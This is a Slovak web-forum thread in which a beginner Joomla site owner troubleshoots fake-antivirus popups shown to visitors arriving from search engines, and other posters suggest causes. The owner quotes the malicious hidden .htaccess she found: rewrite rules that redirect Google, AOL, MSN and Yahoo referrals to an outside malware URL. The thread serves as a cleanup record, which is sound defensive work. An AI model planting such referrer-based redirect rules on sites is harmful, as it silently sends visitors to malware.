ďalšie »

[doho]

Mám problém s ktorým si neviem rady. Myslim, ze je moja stranka napadnuta s falosnym antivirusom "rapid antivirus "alebo antivirus 360. Nie som si ista ci je to tak. Ak sa na stranku chcem dostat z vyhladavaca google, stale vyskoci okno, ktore chce instalovat falosny antispyware a upozornuje na trojske kone atd. Google hlasi, ze stranka je nebezpecna a obsahuje skodlivy softver, alebo take nieco.
http://www.google.sk/search?hl=sk&q=kni%C5%BEnica+poprad&btnG=H%C4%BEada%C5%A5+v+Google&meta=&aq=f&oq=
Je to nova stranka, funguje asi 2 tyzdne.Budem sa ju snazit zabezpecit, neviem si vsak s tymto poradit. Preliezla som kadeco, aj toto forum, ale neviem si rady. Som vlastne zaciatocnik, stranky robim ani nie rok
Prosila som spravcu hostingu aby sa na tento virus zameral. http://www.gatzet.info/sk/rapid-antivirus-removal-20.html/ Skontroloval stranku antivirakom a vraj nijaky virus nenasiel.
Robi to aj cez yahoo, ostatne vyhladavace su v pohode.
 Subory som prekopirovala, nanovo nakopirovala subory, prekontrolovala kody. Zatial som nic nenasla a pomaly som na maslu, lebo som makala na tej stranke ako pako.

Inak stránka funguje normálne a keď ju otvorím priamo, alebo cez iné vyhľadávače, tak je všetko v poriadku. 
Dá sa s tým nieco urobit, alebo to mám vsetko vymazat?
Prosím o pomoc a radu. Pouzivam joomlu 1.0.15
Ada

[Ján Dobiaš]

predmet je zly nenici ta google ale hosting

napada ma ze by si sa mohla opytat admina ci mu niekto nehackol server. podla toho ako sa to sprava to na taky problem typujem. stalo by za pokus otestovat aj ine stranky ktore na danom zeleze hostuje ako sa spravaju ked pride na ne poziadavka ako odkaz z vyhladavaca. Ak tak isto urychlene zmen hosting

PS: admin hostingu ktoremu si oznamila ze mas takyto problem a on to neriesi tak takemu by som nedal spravovat ani komp nasej upratovacky ktora si na nom znaci kolko minula cistiacich prostriedkov.
PS2: google na virus upozornuje inak

[eSeL]

predmet je zly nenici ta google ale hosting

napada ma ze by si sa mohla opytat admina ci mu niekto nehackol server. podla toho ako sa to sprava to na taky problem typujem. stalo by za pokus otestovat aj ine stranky ktore na danom zeleze hostuje ako sa spravaju ked pride na ne poziadavka ako odkaz z vyhladavaca. Ak tak isto urychlene zmen hosting

PS: admin hostingu ktoremu si oznamila ze mas takyto problem a on to neriesi tak takemu by som nedal spravovat ani komp nasej upratovacky ktora si na nom znaci kolko minula cistiacich prostriedkov.
PS2: google na virus upozornuje inak

Ja by som zase prave tej upratovačke na ten komp nanasadil Joomlu bo je derava ako reseto.
Ak ti poskytnu hosting a Ty mas deravy CMS tak netrep somariny, ze su zato zodpovedny... hacknut server a hacknut CSM je nebe a dudy ...si totalne off topic.
Cely kod treba prejst doma localhoste bo infiltracia sa mohla dostat do PC a potom pri kopirovani na server...atd

[doho]

No pravdou je ze zhruba pred dvoma tyzdnami mal problem so serverom. Menil ftp hesla. Pravdepodobne si svoje weby osetril, lebo robi weby v nejakom cms systeme, ale joomla je vraj open source a ma diery a za web je zodpovedny webmaster.
Mam dalsie weby na inych hostingoch ale s takymto problemom som sa este nestretla. Joomla mi maximalne vyhovuje.
Kontrolovala som to cez google. Dala som to prekontrolovat robotmi a co ja viem cim este a vsetko je OK. Myslim, ze je problem v pamati google. Inak to nevidim. Presla som to krizom krazom, prekopirovala, precistila, presla s nod32 a vsetko je ok. Tak uz teraz je to len na google. Dala som ziadost vsetko vymazat z google pamate, uvidime.
Tie chyby mi vyhadzovalo aj ked som stranku dala offline. Ked na to pridem, urcite to pustim do fora, aby aj ini mali moznost odstranit takyto problem.

Kazdy ma pravo na svoj nazor, takze si myslim ze pravda je niekde uprostred.

eSeL vdaka za ponuku, ale prijala by som keby si mi skusil poradit, aby som vedela pre buducnost, co za script to moze byt a kde.

[Ján Dobiaš]

Ja by som zase prave tej upratovačke na ten komp nanasadil Joomlu bo je derava ako reseto.
Ak ti poskytnu hosting a Ty mas deravy CMS tak netrep somariny, ze su zato zodpovedny... hacknut server a hacknut CSM je nebe a dudy ...si totalne off topic.
Cely kod treba prejst doma localhoste bo infiltracia sa mohla dostat do PC a potom pri kopirovani na server...atd

beriem tvoj nazor ale pozrel si sa ako sa to sprava? preco ked zadam adresu tak to ide ked zadam tu istu adresu ako odkaz z niektorych vyhladavacov tak ma to ani nekonektne na stranku ale rovno na vstupe do servera ma to hodi niekde mimo. alebo my chces tvrdit ze tam bezi len jedna stranka? nebezi ked dam priamo ip servera tak mi oznami ze tam je nainstalovani apache.
Este to moze byt niekde pred serverom ale to je skorej vec admina aby si to nasiel. Skontrolujte ostatne stranky na danom zeleze ako sa spravaju ked idu ako odkaz z google

2 doho

PS2: google na virus upozornuje inak

[Michal Hraška]

Ak ti poskytnu hosting a Ty mas deravy CMS tak netrep somariny, ze su zato zodpovedny... hacknut server a hacknut CSM je nebe a dudy ...si totalne off topic.
Cely kod treba prejst doma localhoste bo infiltracia sa mohla dostat do PC a potom pri kopirovani na server...atd

Nechapem preco vsetci tvrdia ze joomla je derava ?

Keby bola derava tak ju napr. v nemecku nenasadzuju na 80% redakcnych webov

PS: Mam joomlu na svojom servery kde mi bezi asi 15 domen s joomlou a zatial som s tym nemal problem. Joomla je tam asi 2 roky na niektorych domenach. Bez problemu bezi

[Ján Dobiaš]

2 eSeL
poprosim o vyjadrenie k danim domenam ktore bezia na danom zeleza
tatryblog.sk
aaa-bike.sk/uvod.htm
tie nebezia na "deravej" joomle a su zaprasene a pred casom este isli. Ako sa tam niekto dostal a zaprasil ich. Preco ich admin serveru nestopne ak je tam rozumni skript tak mu moze zostrelit celi server. A aby som nezabudol nieco zo serverom asi bolo lebo ako pise doho FTP hesla sa nemenia len pre to ze sa admin zle vyspal.

2 doho
mozes mat modifikovani .htaccess ten by mohol ties posielat link mimo skontroluj si to pripadne popros admina.

[eSeL]

2 eSeL
poprosim o vyjadrenie k danim domenam ktore bezia na danom zeleza
tatryblog.sk
aaa-bike.sk/uvod.htm
tie nebezia na "deravej" joomle a su zaprasene a pred casom este isli. Ako sa tam niekto dostal a zaprasil ich. Preco ich admin serveru nestopne ak je tam rozumni skript tak mu moze zostrelit celi server. A aby som nezabudol nieco zo serverom asi bolo lebo ako pise doho FTP hesla sa nemenia len pre to ze sa admin zle vyspal.

2 doho
mozes mat modifikovani .htaccess ten by mohol ties posielat link mimo skontroluj si to pripadne popros admina.

Pre všetkých !!!
Rasťo Turek napísal veľmi dobrý článoček:
Desiatky slovenských domén aktívne distribuujú malware

tu si nájdite ako riešiť svoje problémy s malware, týka sa to viacerých Sk domén, nielen tie Vaše... je ich požehnane na Slovensku ....
Na každej postihnutej stránke je to naviac kód Javascript, php atď.... 

[doho]

Dakujem za vsetky rady. Htacces je v poriadku. Nanovo som ho prekopirovala, vlastne vsetky subory. Ziadna odozva. Patram dalej. Chcem prist veci na koren. Ale bude tam nieco skryte.

[Ján Dobiaš]

2 eSeL dik za link

2 doho
1. co na to vravi admin daneho serveru? ma najviac moznosti odhalit to kde sa to presmeruje.
2. .htaccess a .htaccess.txt su dve rozne veci. Pouzivas .htaccess ? lebo ak nie tak ho nemusis ani vydiet je to sistemovy subor.

[doho]

Zdravim vsetkych.
Prave som si skopirovala stranku do svojho pocitaca. Okrem ineho aj htacces.txt a htacces bez pripony. V tom druhom subore nebolo nič iba takyto kod:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://alamaat.com/video/wmv.php [R,L]

Je mozne ze, je to kamen urazu? Nevidi sa mi to a zda sa mi to podozrive.

Jan - admin mi povedal, ze joomla je derava a za stranku zodpoveda webmaster. A on s joomlou nepracuje, preto sa v tom nevyzna, lebo nie je programator.
Tolko asi. Idem patrat dalej.

[Ján Dobiaš]

  bingo zmaz ho pripadne ho premenuj a pomen ftp hesla. Pokial sa ti to tam dostane znova treba zistit v logoch cez co. Skontroluj si rozsirenia ci su neni na zozname nebezpecnich, ci nemas na servery neake pozostatky rozsireni ktore si testovala a nezmazala.

[doho]

Fajn kod som vymazala.
Google zaradila moju stranku medzi nebezpecne a firefox ,tiez v kuse varuje a vzdy mi najskor nabehne varovne okno.
V googli je pod strankou napisane ze obsahuje nebezpecny softver. Tak som poziadala cez google centrum webmasterov o prehodnotenie obsahu a zaradenie indexu do google.
Vela uzivatelov sa dostavalo na stranku cez google. Sama neviem, ci je problem odstraneny, ci treba este nieco robit a ci google bude moju poziadavku akceptovat.
Ako postupovat? Dakujem za vsetky rady.

PS. Mimochodom, tato skusenost ma vela naucila. Prestudovala som toho vela a naucila som sa dost o bezpecnosti. Smutne, ze clovek musi s niecim takym prist do styku, aby sa mu to vrylo do pamati. Teraz mam v kuse obavy. 

Ada

[doho]

Je to v pohode,
google mi odblokoval stranku.
Strasne sa z toho tesim.
Takze pre vsetkych.
Ak v skrytom subore htacces najde vyssie uvedeny kod, rychlo ho vymazte, aby ste nemali problemy.

Neverila som, ze to zvladnem. Dakujem vsetkym.
Adaaaa

[Ján Dobiaš]

2 doho
vyriesila si dosledok problemu a nie jeho pricinu. Otazka je ako sa ti to tam dostalo. Pokial ale admin serveru nebude spolupracovat tak to nezistis. Ak sa ti to zopakuje a admin ti nepomoze je jedina moznost zbalit sa a ist inde. Ako admin ma moznost zistit ako sa tam dani subor dostal. Ma snad logi serveru tak vie aj odkial to prislo a cez co to prislo. Ale pokial si bude mliet ze joomla je derava tak bud to nevie alebo sa mu nechce.
PS: raz som vydel v akcii skript ktory dokazal prehliadat adresare na servery. ten server na ktorom to vtedy bolo nasadene bol trochu spatne nastaveni. Problem bol v tom ze som nepotreboval vediet ani meno ani heslo a prehliadal som si vsedko co na danom servery bolo a mal som prava ako root. Vies si predstavit keby som sa vtedy spatne vyspal  bolo tam cca 140 domen.